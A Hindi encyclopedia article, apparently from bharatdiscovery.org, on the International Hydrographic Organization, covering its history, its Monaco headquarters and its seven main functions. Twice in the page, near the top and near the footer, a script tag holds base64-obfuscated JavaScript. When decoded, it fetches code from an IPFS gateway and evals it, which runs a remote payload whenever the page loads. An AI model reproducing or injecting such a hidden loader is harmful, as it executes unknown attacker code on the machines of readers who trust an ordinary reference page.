अंतरराष्ट्रीय जल सर्वेक्षण संगठन  

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

अंतरराष्ट्रीय जल सर्वेक्षण संगठन का प्रतीक

अंतरराष्ट्रीय जल सर्वेक्षण संगठन (अंग्रेज़ी: International Hydrographic Organization) को 1921 में मूलत: 'अंतरराष्ट्रीय जल सर्वेक्षण ब्यूरो' के रूप में स्थापित किया गया था। इसका वर्तमान नाम 1970 में सदस्य राष्ट्रों के बीच हुए एक संशोधित अंतरराष्ट्रीय समझौते के परिणाम के रूप में अपनाया गया। इसके पूर्व नाम अंतरराष्ट्रीय जल सर्वेक्षण ब्यूरो को इसके मोनाको स्थित मुख्यालय, जिसके प्रशासनिक निकाय में तीन निदेशक और कुछ कर्मचारी हैं, के लिए प्रयोग किया जाता है।

प्रमुख कार्य

अंतरराष्ट्रीय जल सर्वेक्षण संगठन द्वारा किये जाने वाले प्रमुख कार्य हैं-

  1. राष्ट्रीय जल सर्वेक्षण कार्यालयों के मध्य निकट और स्थायी सहयोग का प्रयास करना।
  2. जल सर्वेक्षण से संबद्ध विज्ञान और तकनीक से संबंधित विषयों का अध्ययन करना।
  3. सदस्य राष्ट्र सरकारों के जल सर्वेक्षण अधिकारियों के बीच समुद्री चार्टरों और दस्तावेजों का आदान प्रदान करना।
  4. अनुरोध पर मार्गदर्शन और सलाह प्रदान करना, विशेषकर उन देशों को जो जल सर्वेक्षण सेवाओं को स्थापित या उनके विस्तार करने के काम में लगी हुई हैं।
  5. जल सर्वेक्षणों का अन्य प्रासंगिक महासागरीय गतिविधियों के साथ समन्वय को प्रोत्साहित करना।
  6. उपलब्ध सुविधाओं और समुद्र विज्ञान से संबंधित अनुप्रयोगों को नौपरिवाहकों के लाभार्थ प्रदान करना।
  7. उन अंतरराष्ट्रीय संगठनों और वैज्ञानिक संस्थानों के साथ सहयोग करना जिनके लक्ष्य जल सर्वेक्षण से संबंधित हैं।
पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>



"https://amp.bharatdiscovery.org/w/index.php?title=अंतरराष्ट्रीय_जल_सर्वेक्षण_संगठन&oldid=647038" से लिया गया